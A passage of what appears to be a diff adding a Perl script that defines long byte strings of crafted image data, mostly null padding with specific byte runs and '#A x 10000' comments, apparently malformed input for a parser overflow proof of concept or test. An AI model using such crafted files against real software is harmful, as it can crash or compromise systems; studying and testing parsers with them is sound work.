+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\xAA\x46\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\xF4\x26\x29\x3A\x1C\x03\x30\x4B\x8A\xFA\x07\x0F\xB5\x0F\x63\xBC\x07\x0F\xBC".
+	        "\xBC\x88\x0F\xB2\x45\x2B\x2D\xD3\xA2\x55\xC9\xD3\xCB\x75\x85\x85\x92\xC4\x3A\x74\x40\x25\x14\xD9\x2B\x43\x77\x96\x2B\x16\xF4\x71".
+	        "\xC4\x80\x18\xEA\x55\xF9\xB3\xF2\xA4\x12\xCF\x6F\xCF\xA9\xCF\x62\xCF\xF3\xF4\xBF\x48\x83\xA4\x9B\x57\x72\x48\x78\x48\x6D\x48\x34".
+	        "\x74\xE1\x0C\xB6\x01\x36\x00\x2E\x72\x4B\x2E\x8B\xEB\x31\x1F\xD0\x1F\x5E\xAD\x2F\x1F\xDA\xAD\x8A\x1F\xE1\x65\x77\x2D\xE3\xEE\x60".
+	        "\x9B\xE6\x82\x49\xCA\xF7\xAB\xC6\x08\x7A\x73\x22\x07\x9E\x23\x5C\x4E\x64\x03\x23\xFC\x48\xF7\xB8\x0D\xF1\x43\xA6\xB6\x5A\xB7\x1E".
+	        "\xDF\x13\xDF\x91\xDF\x6C\xDF\xE3\xE5\x8F\x78\x8D\x1C\xD3\x11\x5E\x78\x64\x78\x0B\x78\x48\x66\xB9\x80\x74\xD0\x16\x48\x0B\x50\x0A".
+	        "\x1A\x2A\xDE\xE5\xE1\x1A\xD2\xC1\xD0\x9D\xEB\x1D\xF9\x1D\xDA\x95\xD8\xF9\xB3\xDB\xE9\xD3\xB5\xA4\xD2\xB7\xCE\xEE\xDB\x3A\xC5\x35".
+	        "\x7B\xD5\x31\xAF\x0E\x5B\x50\x92\x92\xB7\x14\x78\x5E\x6C\xA4\xB0\x17\x18\x6F\xD9\x5D\x9C\x95\x94\x7B\x75\xDA\x97\xA1\xAD\x8D\x24".
+	        "\xF0\xB9\x87\x44\x18\x2B\x7C\x0B\x06\xCD\xB5\x9A\x4A\x42\x4F\x16\xC3\x0B\x6F\x02\xD8\x4E\x5B\xEB\xE9\xE0\xCC\xBA\x64\x0B\x0C\x5D".
+	        "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x18\x01\xFF\x43\x44\x30\x30\x31";
+                #A x 10000
+my $img_data2 =  "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD9\x85\xCF\x51\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\xF7\x10\xF5\xAA\x89\x78\x20\x20\xD5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x92\x4C\xF3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x08\xF4".
+	        "\x55\xCA\x3C\x10\x10\xE4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\xAF\x17\x83\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\xD5\x93\xA6\x47\xE6\x17\x95\xC3\x00\x00\x00\x00\x00\x00\x00\x00\xBA\x00\x02\xC3\x1F\x71\xC6\x4C".
+	        "\xA7\x2D\x51\x74\x97\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\xC2\x33\x31".
+	        "\x13\x27\x3A\xD4\x00\x00\x00\x00\x00\x00\x00\x00\x4F\x00\xD6\x16\x76\xB5\x60\xE4\xA6\x22\xA6\x34\x8F\x12\x00\xFF\xFF\xFF\xFF\xFF".
+	        "\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x19\x01\x01\x00\x17\x00\x00\x00\x01\x00\x00\x00\x02\x00\x18\x00\x00\x00\x01\x00\x41\x31\x02\x00".
+	        "\x19\x00\x00\x00\x01\x00\x41\x32\x02\x00\x1A\x00\x00\x00\x01\x00\x41\x33\x02\x00\x1B\x00\x00\x00\x01\x00\x41\x34";
+                #A x 10000
+my $img_data3 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
